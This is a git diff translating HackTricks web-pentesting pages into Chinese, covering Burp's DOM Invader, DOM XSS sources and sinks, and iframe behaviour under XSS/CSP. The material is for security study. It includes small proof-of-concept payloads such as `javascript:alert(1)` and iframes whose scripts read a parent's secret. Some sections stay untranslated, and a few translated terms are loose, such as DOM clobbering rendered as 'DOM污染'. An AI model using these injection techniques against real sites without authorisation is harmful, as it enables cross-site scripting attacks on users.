 <figure><img src="../../images/image (1129).png" alt=""><figcaption></figcaption></figure>
 
-Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
+现在刷新页面，在 **Dev Tools** 中你会找到 **DOM Invader 选项卡：**
 
 <figure><img src="../../images/image (695).png" alt=""><figcaption></figcaption></figure>
 
-### Inject a Canary
+### 注入一个 Canary
 
-In the previous image you can see a **random group of chars, that is the Canary**. You should now start **injecting** it in different parts of the web (params, forms, url...) and each time click search it. DOM Invader will check if the **canary ended in any interesting sink** that could be exploited.
+在前面的图像中，你可以看到一个 **随机字符组，即 Canary**。你现在应该开始在网页的不同部分（参数、表单、URL...）中 **注入** 它，并每次点击搜索。DOM Invader 将检查 **canary 是否结束于任何有趣的接收器**，可能被利用。
 
-Moreover, the options **Inject URL params** and Inject forms will automatically open a **new tab** **injecting** the **canary** in every **URL** param and **form** it finds.
+此外，选项 **Inject URL params** 和 Inject forms 将自动打开一个 **新选项卡**，**注入** 每个找到的 **URL** 参数和 **表单** 中的 **canary**。
 
-### Inject an empty Canary
+### 注入一个空 Canary
 
-If you just want to find potential sinks the page might have, even if they aren't exploitable, you can **search for an empty canary**.
+如果你只是想找到页面可能存在的潜在接收器，即使它们不可利用，你可以 **搜索一个空的 canary**。
 
 ### Post Messages
 
-DOM Invader allows testing for DOM XSS using web messages with features such as:
+DOM Invader 允许使用网络消息测试 DOM XSS，具有以下功能：
 
-1. **Logging web messages** sent via `postMessage()`, akin to Burp Proxy's HTTP request/response history logging.
-2. **Modification** and **reissue** of web messages to manually test for DOM XSS, similar to Burp Repeater's function.
-3. **Automatic alteration** and sending of web messages for probing DOM XSS.
+1. **记录通过 `postMessage()` 发送的网络消息**，类似于 Burp Proxy 的 HTTP 请求/响应历史记录日志。
+2. **修改** 和 **重新发送** 网络消息以手动测试 DOM XSS，类似于 Burp Repeater 的功能。
+3. **自动更改** 和发送网络消息以探测 DOM XSS。
 
-#### Message details
+#### 消息详情
 
-Detailed information can be viewed about each message by clicking on it, which includes whether the client-side JavaScript accesses the `origin`, `data`, or `source` properties of the message.
+通过点击每条消息，可以查看详细信息，包括客户端 JavaScript 是否访问了消息的 `origin`、`data` 或 `source` 属性。
 
-- **`origin`** : If the **origin information of the message is not check**, you may be able to send cross-origin messages to the event handler **from an arbitrary external domain**. But if it's checked it still could be insecure.
-- **`data`**: This is where the payload is sent. If this data is not used, the sink is useless.
-- **`source`**: Evaluates if the source property, usually referencing an iframe, is validated instead of the origin. Even if this is checked, it doesn't assure the validation can't be bypassed.
+- **`origin`** : 如果 **消息的来源信息未检查**，你可能能够从 **任意外部域** 向事件处理程序发送跨域消息。但如果进行了检查，仍然可能不安全。
+- **`data`**: 这是发送有效负载的地方。如果此数据未使用，则接收器无用。
+- **`source`**: 评估源属性，通常引用一个 iframe，是否经过验证而不是来源。即使进行了检查，也不能保证验证无法被绕过。
 
-#### Reply a message
+#### 回复消息
 
-1. From the **Messages** view, click on any message to open the message details dialog.
-2. Edit the **Data** field as required.
-3. Click **Send**.
+1. 从 **Messages** 视图中，点击任何消息以打开消息详情对话框。
+2. 根据需要编辑 **Data** 字段。
+3. 点击 **Send**。
 
-### Prototype Pollution
+### 原型污染
 
-DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
+DOM Invader 还可以搜索 **原型污染漏洞**。首先，你需要启用它：
 
 <figure><img src="../../images/image (1026).png" alt=""><figcaption></figcaption></figure>
 
-Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
-
-If anything is found a **Test** button will appear to **test the found source**. Click on it, a new tab will appear, create an object in the console and check if the `testproperty` exists:
+然后，它将 **搜索源**，使你能够向 **`Object.prototype`** 添加任意属性。
 
+如果找到任何内容，将出现一个 **Test** 按钮以 **测试找到的源**。点击它，将出现一个新选项卡，在控制台中创建一个对象并检查 `testproperty` 是否存在：
 ```javascript
 let b = {}
 b.testproperty
 ```
+一旦你找到一个源，你可以**扫描小工具**：
 
-Once you found a source you can **scan for a gadget**:
+1. 当点击**扫描小工具**按钮时，DOM Invader会在**DOM**视图中任何已识别的原型污染源旁边打开一个新标签。然后开始扫描合适的小工具。
+2. 与此同时，在同一标签中，**DOM Invader**标签应在DevTools面板中打开。扫描完成后，通过已识别的小工具访问的任何接收点将在**DOM**视图中显示。例如，下面的示例中显示了一个名为`html`的小工具属性被传递到`innerHTML`接收点。
 
-1. A new tab is opened by DOM Invader when the **Scan for gadgets** button, which can be found next to any identified prototype pollution source in the **DOM** view, is clicked. The scanning for suitable gadgets then begins.
-2. Meanwhile, in the same tab, the **DOM Invader** tab should be opened in the DevTools panel. After the scan completes, any sinks accessible via the identified gadgets are displayed in the **DOM** view. For instance, a gadget property named `html` being passed to the `innerHTML` sink is shown in the example below.
+## DOM污染
 
-## DOM clobbering
+在前面的图像中，可以看到可以开启DOM污染扫描。一旦完成，**DOM Invader将开始搜索DOM污染漏洞**。
 
-In the previous image it's possible to see that DOM clobbering scan can be turned on. Once done, **DOM Invader will start searching for DOM clobbering vulnerabilities**.
-
-## References
+## 参考
 
 - [https://portswigger.net/burp/documentation/desktop/tools/dom-invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)
 - [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling)
@@ -89,4 +87,3 @@ In the previous image it's possible to see that DOM clobbering scan can be turne
 - [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
index b47099d68..c21ae6f54 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -2,20 +2,19 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## DOM Vulnerabilities
+## DOM 漏洞
 
-DOM vulnerabilities occur when data from attacker-controlled **sources** (like `location.search`, `document.referrer`, or `document.cookie`) is unsafely transferred to **sinks**. Sinks are functions or objects (e.g., `eval()`, `document.body.innerHTML`) that can execute or render harmful content if given malicious data.
+DOM 漏洞发生在来自攻击者控制的 **sources**（如 `location.search`、`document.referrer` 或 `document.cookie`）的数据不安全地传输到 **sinks** 时。Sinks 是可以执行或渲染有害内容的函数或对象（例如 `eval()`、`document.body.innerHTML`），如果给定恶意数据。
 
-- **Sources** are inputs that can be manipulated by attackers, including URLs, cookies, and web messages.
-- **Sinks** are potentially dangerous endpoints where malicious data can lead to adverse effects, such as script execution.
+- **Sources** 是可以被攻击者操控的输入，包括 URL、cookies 和网页消息。
+- **Sinks** 是潜在危险的端点，恶意数据可能导致不良后果，例如脚本执行。
 
-The risk arises when data flows from a source to a sink without proper validation or sanitation, enabling attacks like XSS.
+风险在于数据从源流向汇时没有适当的验证或清理，从而使攻击如 XSS 成为可能。
 
 > [!NOTE]
-> **You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)
-
-**Common sources:**
+> **您可以在** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) **找到更更新的 sources 和 sinks 列表**
 
+**常见 sources：**
 ```javascript
 document.URL
 document.documentURI
@@ -32,10 +31,9 @@ sessionStorage
 IndexedDB(mozIndexedDB, webkitIndexedDB, msIndexedDB)
 Database
 ```
+**常见的接收点：**
 
-**Common Sinks:**
-
-| [**Open Redirect**](dom-xss.md#open-redirect)                                    | [**Javascript Injection**](dom-xss.md#javascript-injection)                         | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation) | **jQuery**                                                             |
+| [**开放重定向**](dom-xss.md#open-redirect)                                    | [**Javascript 注入**](dom-xss.md#javascript-injection)                         | [**DOM 数据操作**](dom-xss.md#dom-data-manipulation) | **jQuery**                                                             |
 | -------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------- | ------------------------------------------------------------- | ---------------------------------------------------------------------- |
 | `location`                                                                       | `eval()`                                                                            | `scriptElement.src`                                           | `add()`                                                                |
 | `location.host`                                                                  | `Function() constructor`                                                            | `scriptElement.text`                                          | `after()`                                                              |
@@ -47,47 +45,46 @@ Database
 | `location.assign()`                                                              | `msSetImmediate()`                                                                  | `someDOMElement.textContent`                                  | `html()`                                                               |
 | `location.replace()`                                                             | `range.createContextualFragment()`                                                  | `someDOMElement.innerText`                                    | `prepend()`                                                            |
 | `open()`                                                                         | `crypto.generateCRMFRequest()`                                                      | `someDOMElement.outerText`                                    | `replaceAll()`                                                         |
-| `domElem.srcdoc`                                                                 | **\`\`**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value`                                        | `replaceWith()`                                                        |
+| `domElem.srcdoc`                                                                 | **\`\`**[**本地文件路径操作**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value`                                        | `replaceWith()`                                                        |
 | `XMLHttpRequest.open()`                                                          | `FileReader.readAsArrayBuffer()`                                                    | `someDOMElement.name`                                         | `wrap()`                                                               |
 | `XMLHttpRequest.send()`                                                          | `FileReader.readAsBinaryString()`                                                   | `someDOMElement.target`                                       | `wrapInner()`                                                          |
 | `jQuery.ajax()`                                                                  | `FileReader.readAsDataURL()`                                                        | `someDOMElement.method`                                       | `wrapAll()`                                                            |
 | `$.ajax()`                                                                       | `FileReader.readAsText()`                                                           | `someDOMElement.type`                                         | `has()`                                                                |
-| **\`\`**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation)    | `FileReader.readAsFile()`                                                           | `someDOMElement.backgroundImage`                              | `constructor()`                                                        |
+| **\`\`**[**Ajax 请求操作**](dom-xss.md#ajax-request-manipulation)    | `FileReader.readAsFile()`                                                           | `someDOMElement.backgroundImage`                              | `constructor()`                                                        |
 | `XMLHttpRequest.setRequestHeader()`                                              | `FileReader.root.getFile()`                                                         | `someDOMElement.cssText`                                      | `init()`                                                               |
 | `XMLHttpRequest.open()`                                                          | `FileReader.root.getFile()`                                                         | `someDOMElement.codebase`                                     | `index()`                                                              |
-| `XMLHttpRequest.send()`                                                          | [**Link manipulation**](dom-xss.md#link-manipulation)                               | `someDOMElement.innerHTML`                                    | `jQuery.parseHTML()`                                                   |
+| `XMLHttpRequest.send()`                                                          | [**链接操作**](dom-xss.md#link-manipulation)                               | `someDOMElement.innerHTML`                                    | `jQuery.parseHTML()`                                                   |
 | `jQuery.globalEval()`                                                            | `someDOMElement.href`                                                               | `someDOMElement.outerHTML`                                    | `$.parseHTML()`                                                        |
-| `$.globalEval()`                                                                 | `someDOMElement.src`                                                                | `someDOMElement.insertAdjacentHTML`                           | [**Client-side JSON injection**](dom-xss.md#client-side-sql-injection) |
-| **\`\`**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action`                                                             | `someDOMElement.onevent`                                      | `JSON.parse()`                                                         |
-| `sessionStorage.setItem()`                                                       | [**XPath injection**](dom-xss.md#xpath-injection)                                   | `document.write()`                                            | `jQuery.parseJSON()`                                                   |
+| `$.globalEval()`                                                                 | `someDOMElement.src`                                                                | `someDOMElement.insertAdjacentHTML`                           | [**客户端 JSON 注入**](dom-xss.md#client-side-sql-injection) |
+| **\`\`**[**HTML5 存储操作**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action`                                                             | `someDOMElement.onevent`                                      | `JSON.parse()`                                                         |
+| `sessionStorage.setItem()`                                                       | [**XPath 注入**](dom-xss.md#xpath-injection)                                   | `document.write()`                                            | `jQuery.parseJSON()`                                                   |
 | `localStorage.setItem()`                                                         | `document.evaluate()`                                                               | `document.writeln()`                                          | `$.parseJSON()`                                                        |
-| **``**[**`Denial of Service`**](dom-xss.md#denial-of-service)**``**              | `someDOMElement.evaluate()`                                                         | `document.title`                                              | **\`\`**[**Cookie manipulation**](dom-xss.md#cookie-manipulation)      |
-| `requestFileSystem()`                                                            | **\`\`**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()`                | `document.cookie`                                                      |
-| `RegExp()`                                                                       | `document.domain`                                                                   | `history.pushState()`                                         | [**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning)      |
-| [**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection)            | [**Web-message manipulation**](dom-xss.md#web-message-manipulation)                 | `history.replaceState()`                                      | `WebSocket`                                                            |
+| **``**[**拒绝服务**](dom-xss.md#denial-of-service)**``**              | `someDOMElement.evaluate()`                                                         | `document.title`                                              | **\`\`**[**Cookie 操作**](dom-xss.md#cookie-manipulation)      |
+| `requestFileSystem()`                                                            | **\`\`**[**文档域操作**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()`                | `document.cookie`                                                      |
+| `RegExp()`                                                                       | `document.domain`                                                                   | `history.pushState()`                                         | [**WebSocket URL 中毒**](dom-xss.md#websocket-url-poisoning)      |
+| [**客户端 SQL 注入**](dom-xss.md#client-side-sql-injection)            | [**Web 消息操作**](dom-xss.md#web-message-manipulation)                 | `history.replaceState()`                                      | `WebSocket`                                                            |
 | `executeSql()`                                                                   | `postMessage()`                                                                     | \`\`                                                          | \`\`                                                                   |
 
-The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`.
+**`innerHTML`** 接收点在任何现代浏览器中都不接受 `script` 元素，也不会触发 `svg onload` 事件。这意味着您需要使用替代元素，如 `img` 或 `iframe`。
 
-This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using** any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS.
+这种类型的 XSS 可能是 **最难发现的**，因为您需要查看 JS 代码，看看它是否 **使用** 任何您 **控制** 的对象的 **值**，在这种情况下，查看是否有 **任何方法可以滥用** 它以执行任意 JS。
 
-## Tools to find them
+## 查找工具
 
 - [https://github.com/mozilla/eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized)
-- Browser extension to check every data taht reaches a potential sink: [https://github.com/kevin-mizu/domloggerpp](https://github.com/kevin-mizu/domloggerpp)
+- 检查每个到达潜在接收点的数据的浏览器扩展：[https://github.com/kevin-mizu/domloggerpp](https://github.com/kevin-mizu/domloggerpp)
 
-## Examples
+## 示例
 
-### Open Redirect
+### 开放重定向
 
-From: [https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection)
+来自：[https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection)
 
-**Open redirect vulnerabilities in the DOM** occur when a script writes data, which an attacker can control, into a sink capable of initiating navigation across domains.
+**DOM 中的开放重定向漏洞** 发生在脚本将攻击者可以控制的数据写入能够跨域发起导航的接收点时。
 
-It's crucial to understand that executing arbitrary code, such as **`javascript:alert(1)`**, is possible if you have control over the start of the URL where the redirection occurs.
-
-Sinks:
+理解执行任意代码（例如 **`javascript:alert(1)`**）是可能的，如果您控制重定向发生的 URL 开头，这是至关重要的。
 
+接收点：
 ```javascript
 location
 location.host
@@ -105,27 +102,23 @@ XMLHttpRequest.send()
 jQuery.ajax()
 $.ajax()
 ```
-
 ### Cookie manipulation
 
-From: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation)
+来自: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation)
 
-DOM-based cookie-manipulation vulnerabilities occur when a script incorporates data, which can be controlled by an attacker, into the value of a cookie. This vulnerability can lead to unexpected behavior of the webpage if the cookie is utilized within the site. Additionally, it can be exploited to carry out a session fixation attack if the cookie is involved in tracking user sessions. The primary sink associated with this vulnerability is:
+基于DOM的cookie操控漏洞发生在脚本将攻击者可以控制的数据纳入cookie的值时。如果在网站内使用该cookie，这个漏洞可能导致网页出现意外行为。此外，如果cookie涉及用户会话跟踪，它可以被利用来进行会话固定攻击。与此漏洞相关的主要接收点是：
 
 Sinks:
-
 ```javascript
 document.cookie
 ```
+### JavaScript 注入
 
-### JavaScript Injection
+来自: [https://portswigger.net/web-security/dom-based/javascript-injection](https://portswigger.net/web-security/dom-based/javascript-injection)
 
-From: [https://portswigger.net/web-security/dom-based/javascript-injection](https://portswigger.net/web-security/dom-based/javascript-injection)
-
-DOM-based JavaScript injection vulnerabilities are created when a script runs data, which can be controlled by an attacker, as JavaScript code.
+基于 DOM 的 JavaScript 注入漏洞是在脚本将可以被攻击者控制的数据作为 JavaScript 代码运行时产生的。
 
 Sinks:
-
 ```javascript
 eval()
 Function() constructor
@@ -138,53 +131,47 @@ msSetImmediate()
 range.createContextualFragment()
 crypto.generateCRMFRequest()
 ```
-
 ### Document-domain manipulation
 
 From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation)
 
-**Document-domain manipulation vulnerabilities** occur when a script sets the `document.domain` property using data that an attacker can control.
+**文档域操控漏洞** 发生在脚本使用攻击者可以控制的数据设置 `document.domain` 属性时。
 
-The `document.domain` property plays a **key role** in the **enforcement** of the **same-origin policy** by browsers. When two pages from different origins set their `document.domain` to the **same value**, they can interact without restrictions. Although browsers impose certain **limits** on the values assignable to `document.domain`, preventing the assignment of completely unrelated values to the actual page origin, exceptions exist. Typically, browsers permit the use of **child** or **parent domains**.
+`document.domain` 属性在浏览器的 **同源策略** 的 **执行** 中发挥着 **关键作用**。当来自不同源的两个页面将它们的 `document.domain` 设置为 **相同的值** 时，它们可以不受限制地进行交互。尽管浏览器对可分配给 `document.domain` 的值施加了某些 **限制**，防止将完全不相关的值分配给实际页面源，但仍然存在例外。通常，浏览器允许使用 **子域** 或 **父域**。 
 
 Sinks:
-
 ```javascript
 document.domain
 ```
+### WebSocket-URL 中毒
 
-### WebSocket-URL poisoning
+来自: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
 
-From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
-
-**WebSocket-URL poisoning** occurs when a script utilizes **controllable data as the target URL** for a WebSocket connection.
+**WebSocket-URL 中毒** 发生在脚本将 **可控数据作为 WebSocket 连接的目标 URL** 使用时。
 
 Sinks:
 
-The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities.
+`WebSocket` 构造函数可能导致 WebSocket-URL 中毒漏洞。
 
-### Link manipulation
+### 链接操控
 
-From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
+来自: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
 
-**DOM-based link-manipulation vulnerabilities** arise when a script writes **attacker-controllable data to a navigation target** within the current page, such as a clickable link or the submission URL of a form.
+**基于 DOM 的链接操控漏洞** 出现于脚本将 **攻击者可控的数据写入当前页面的导航目标**，例如可点击的链接或表单的提交 URL。
 
 Sinks:
-
 ```javascript
 someDOMElement.href
 someDOMElement.src
 someDOMElement.action
 ```
+### Ajax请求操控
 
-### Ajax request manipulation
+来自: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
-
-**Ajax request manipulation vulnerabilities** arise when a script writes **attacker-controllable data into an Ajax request** that is issued using an `XmlHttpRequest` object.
-
-Sinks:
+**Ajax请求操控漏洞** 出现于脚本将 **攻击者可控的数据写入使用 `XmlHttpRequest` 对象发出的Ajax请求** 时。
 
+接收点:
 ```javascript
 XMLHttpRequest.setRequestHeader()
 XMLHttpRequest.open()
@@ -192,15 +179,13 @@ XMLHttpRequest.send()
 jQuery.globalEval()
 $.globalEval()
 ```
+### 本地文件路径操控
 
-### Local file-path manipulation
+来自: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
 
-From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
-
-**Local file-path manipulation vulnerabilities** arise when a script passes **attacker-controllable data to a file-handling API** as the `filename` parameter. This vulnerability can be exploited by an attacker to construct a URL that, if visited by another user, could lead to the **user's browser opening or writing an arbitrary local file**.
+**本地文件路径操控漏洞** 出现于脚本将 **攻击者可控的数据传递给文件处理API** 作为 `filename` 参数时。攻击者可以利用此漏洞构造一个URL，如果另一个用户访问该URL，可能导致 **用户的浏览器打开或写入任意本地文件**。
 
 Sinks:
-
 ```javascript
 FileReader.readAsArrayBuffer()
 FileReader.readAsBinaryString()
@@ -210,77 +195,67 @@ FileReader.readAsFile()
 FileReader.root.getFile()
 FileReader.root.getFile()
 ```
+### 客户端 SQL 注入
 
-### Client-Side SQl injection
+来自: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
 
-From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
-
-**Client-side SQL-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into a client-side SQL query in an unsafe way**.
+**客户端 SQL 注入漏洞** 发生在脚本以 **不安全的方式将攻击者可控的数据纳入客户端 SQL 查询** 时。
 
 Sinks:
-
 ```javascript
 executeSql()
 ```
-
 ### HTML5-storage manipulation
 
 From: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation)
 
-**HTML5-storage manipulation vulnerabilities** arise when a script **stores attacker-controllable data in the web browser's HTML5 storage** (`localStorage` or `sessionStorage`). While this action is not inherently a security vulnerability, it becomes problematic if the application subsequently **reads the stored data and processes it unsafely**. This could allow an attacker to leverage the storage mechanism to conduct other DOM-based attacks, such as cross-site scripting and JavaScript injection.
+**HTML5-storage manipulation vulnerabilities** 出现于脚本 **在网页浏览器的 HTML5 存储中存储攻击者可控的数据** (`localStorage` 或 `sessionStorage`)。虽然此操作本身并不是安全漏洞，但如果应用程序随后 **读取存储的数据并不安全地处理它**，则会变得有问题。这可能允许攻击者利用存储机制进行其他基于 DOM 的攻击，例如跨站脚本和 JavaScript 注入。
 
 Sinks:
-
 ```javascript
 sessionStorage.setItem()
 localStorage.setItem()
 ```
+### XPath 注入
 
-### XPath injection
+来自: [https://portswigger.net/web-security/dom-based/client-side-xpath-injection](https://portswigger.net/web-security/dom-based/client-side-xpath-injection)
 
-From: [https://portswigger.net/web-security/dom-based/client-side-xpath-injection](https://portswigger.net/web-security/dom-based/client-side-xpath-injection)
-
-**DOM-based XPath-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into an XPath query**.
-
-Sinks:
+**基于 DOM 的 XPath 注入漏洞** 发生在脚本将 **攻击者可控的数据纳入 XPath 查询** 时。
 
+接收点:
 ```javascript
 document.evaluate()
 someDOMElement.evaluate()
 ```
+### 客户端 JSON 注入
 
-### Client-side JSON injection
+来自: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection)
 
-From: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection)
-
-**DOM-based JSON-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application**.
+**基于 DOM 的 JSON 注入漏洞** 发生在脚本将 **攻击者可控的数据纳入一个被解析为 JSON 数据结构的字符串中，然后由应用程序处理**。
 
 Sinks:
-
 ```javascript
 JSON.parse()
 jQuery.parseJSON()
 $.parseJSON()
 ```
-
 ### Web-message manipulation
 
 From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
 
-**Web-message vulnerabilities** arise when a script sends **attacker-controllable data as a web message to another document** within the browser. An **example** of vulnerable Web-message manipulation can be found at [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source).
+**Web-message vulnerabilities** 在脚本将 **攻击者可控的数据作为网络消息发送到浏览器内的另一个文档** 时出现。一个 **示例** 的易受攻击的Web消息操控可以在 [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source) 找到。
 
 Sinks:
 
-The `postMessage()` method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
+`postMessage()` 方法用于发送网络消息，如果接收消息的事件监听器以不安全的方式处理传入数据，则可能导致漏洞。
 
 ### DOM-data manipulation
 
 From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
 
-**DOM-data manipulation vulnerabilities** arise when a script writes **attacker-controllable data to a field within the DOM** that is utilized within the visible UI or client-side logic. This vulnerability can be exploited by an attacker to construct a URL that, if visited by another user, can alter the appearance or behaviour of the client-side UI.
+**DOM-data manipulation vulnerabilities** 在脚本将 **攻击者可控的数据写入DOM中的一个字段** 时出现，该字段在可见的UI或客户端逻辑中被使用。攻击者可以利用此漏洞构造一个URL，如果另一个用户访问该URL，可能会改变客户端UI的外观或行为。
 
 Sinks:
-
 ```javascript
 scriptElement.src
 scriptElement.text
@@ -305,20 +280,17 @@ document.implementation.createHTMLDocument()
 history.pushState()
 history.replaceState()
 ```
+### 拒绝服务
 
-### Denial of Service
+来自: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
 
-From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
-
-**DOM-based denial-of-service vulnerabilities** occur when a script passes **attacker-controllable data unsafely to a problematic platform API**. This includes APIs that, when invoked, can lead the user's computer to consume **excessive amounts of CPU or disk space**. Such vulnerabilities can have significant side effects, such as the browser restricting the website's functionality by rejecting attempts to store data in `localStorage` or terminating busy scripts.
+**基于DOM的拒绝服务漏洞**发生在脚本将**攻击者可控的数据不安全地传递给有问题的平台API**时。这包括在调用时可能导致用户计算机消耗**过多的CPU或磁盘空间**的API。这类漏洞可能会产生显著的副作用，例如浏览器通过拒绝存储数据到`localStorage`或终止繁忙的脚本来限制网站的功能。
 
 Sinks:
-
 ```javascript
 requestFileSystem()
 RegExp()
 ```
-
 ## Dom Clobbering
 
 {{#ref}}
@@ -326,4 +298,3 @@ dom-clobbering.md
 {{#endref}}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index b3d8cee29..929403863 100644
--- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -4,91 +4,86 @@
 
 ## Iframes in XSS
 
-There are 3 ways to indicate the content of an iframed page:
+有3种方式来指示iframe页面的内容：
 
-- Via `src` indicating an URL (the URL may be cross origin or same origin)
-- Via `src` indicating the content using the `data:` protocol
-- Via `srcdoc` indicating the content
-
-**Accesing Parent & Child vars**
+- 通过`src`指示一个URL（该URL可以是跨源或同源）
+- 通过`src`使用`data:`协议指示内容
+- 通过`srcdoc`指示内容
 
+**访问父变量和子变量**
 ```html
 <html>
-  <script>
-    var secret = "31337s3cr37t"
-  </script>
+<script>
+var secret = "31337s3cr37t"
+</script>
 
-  <iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
-  <iframe id="if2" src="child.html"></iframe>
-  <iframe
-    id="if3"
-    srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
-  <iframe
-    id="if4"
-    src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
+<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
+<iframe id="if2" src="child.html"></iframe>
+<iframe
+id="if3"
+srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
+<iframe
+id="if4"
+src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
 
-  <script>
-    function access_children_vars() {
-      alert(if1.secret)
-      alert(if2.secret)
-      alert(if3.secret)
-      alert(if4.secret)
-    }
-    setTimeout(access_children_vars, 3000)
-  </script>
+<script>
+function access_children_vars() {
+alert(if1.secret)
+alert(if2.secret)
+alert(if3.secret)
+alert(if4.secret)
+}
+setTimeout(access_children_vars, 3000)
+</script>
 </html>
 ```
 
 ```html
 <!-- content of child.html -->
 <script>
-  var secret = "child secret"
-  alert(parent.secret)
+var secret = "child secret"
+alert(parent.secret)
 </script>
 ```
+如果您通过 http 服务器（如 `python3 -m http.server`）访问之前的 html，您会注意到所有脚本都会被执行（因为没有 CSP 阻止它）。**父级将无法访问任何 iframe 内部的 `secret` 变量**，**只有 if2 和 if3（被视为同站）可以访问原始窗口中的 secret**。\
+注意 if4 被认为具有 `null` 来源。
 
-If you access the previous html via a http server (like `python3 -m http.server`) you will notice that all the scripts will be executed (as there is no CSP preventing it)., **the parent won’t be able to access the `secret` var inside any iframe** and **only the iframes if2 & if3 (which are considered to be same-site) can access the secret** in the original window.\
-Note how if4 is considered to have `null` origin.
-
-### Iframes with CSP <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
